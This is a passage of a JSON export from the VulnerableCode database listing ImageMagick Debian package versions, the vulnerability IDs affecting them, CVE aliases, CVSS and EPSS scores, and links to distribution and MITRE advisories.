"VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-7396" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x95w-ad3j-n7aj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82484?format=api", "vulnerability_id": "VCID-x998-fhs5-93ht", "summary": "ImageMagick: heap-based buffer over-read in MagickCore/fourier.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13391.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13391.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00619", "scoring_system": "epss", "scoring_elements": "0.70068", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00631", "scoring_system": "epss", "scoring_elements": "0.70239", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00631", "scoring_system": "epss", "scoring_elements": "0.70251", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00631", "scoring_system": "epss", "scoring_elements": "0.70268", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00631", "scoring_system": "epss", "scoring_elements": "0.70245", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00631", "scoring_system": "epss", "scoring_elements": "0.70291", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00631", "scoring_system": "epss", "scoring_elements": "0.70306", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00631", "scoring_system": "epss", "scoring_elements": "0.70329", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00631", "scoring_system": "epss", "scoring_elements": "0.70314", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00631", "scoring_system": "epss", "scoring_elements": "0.70301", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00631", "scoring_system": "epss", "scoring_elements": "0.70344", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00631", "scoring_system": "epss", "scoring_elements": "0.70354", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00631", "scoring_system": "epss", "scoring_elements": "0.70335", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1727739", "reference_id": "1727739", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1727739" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931633", "reference_id": "931633", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931633" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": 